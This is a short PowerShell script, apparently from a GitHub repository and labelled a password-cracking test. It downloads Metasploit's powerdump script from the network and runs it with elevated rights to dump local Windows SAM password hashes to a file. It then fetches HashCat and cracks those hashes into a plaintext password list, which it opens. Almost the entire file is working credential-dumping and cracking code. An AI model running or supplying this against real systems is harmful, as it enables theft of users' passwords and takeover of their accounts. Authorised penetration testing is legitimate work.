/
Local-User-Password-Dump-HashCat-password-cracking-test.ps1
37 lines (31 loc) · 1.39 KB
/
Local-User-Password-Dump-HashCat-password-cracking-test.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
# This must run with elevated privileges
# Download powerdump
curl "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/powershell/powerdump.ps1" -OutFile "$env:TEMP\powerdump.ps1"
$startInfo = New-Object System.Diagnostics.ProcessStartInfo
$startInfo.FileName = "powershell.exe"
$startInfo.Arguments = "$env:TEMP\powerdump.ps1"
$startInfo.RedirectStandardOutput = $true
$startInfo.UseShellExecute = $false
$startInfo.CreateNoWindow = $false
#$startInfo.Username = "DOMAIN\Username"
#$startInfo.Password = $password
$process = New-Object System.Diagnostics.Process
$process.StartInfo = $startInfo
$process.Start() | Out-Null
$standardOut = $process.StandardOutput.ReadToEnd()
$process.WaitForExit()
# $standardOut should contain the results of powerdump
clear
$standardOut
$standardOut | Out-File ".\localSAM" -Encoding utf8 -ErrorAction Ignore
# Download HashCat for Windows
curl "https://hashcat.net/files/hashcat-3.6.0.7z" -OutFile "hashcat-3.6.0.7z"
$7z = test-path "$env:ProgramFiles\7-Zip\7z.exe"
if ($7z -eq $false){ curl "http://7-zip.org/a/7z1700-x64.exe" -OutFile .\7z.exe; Invoke-Item .\7z.exe }
7za x hashcat-3.6.0.7z
$Crack = ".\hashcat-3.6.0\hashcat64.exe"
$CrackParams = @('localSAM')
$Prms = $CrackParams.Split(" ")
$Passwords = & $Crack "localSAM"
$Passwords | Out-File "Local-passwords.txt" -Encoding utf8 -ErrorAction Ignore
Invoke-Item "Local-passwords.txt"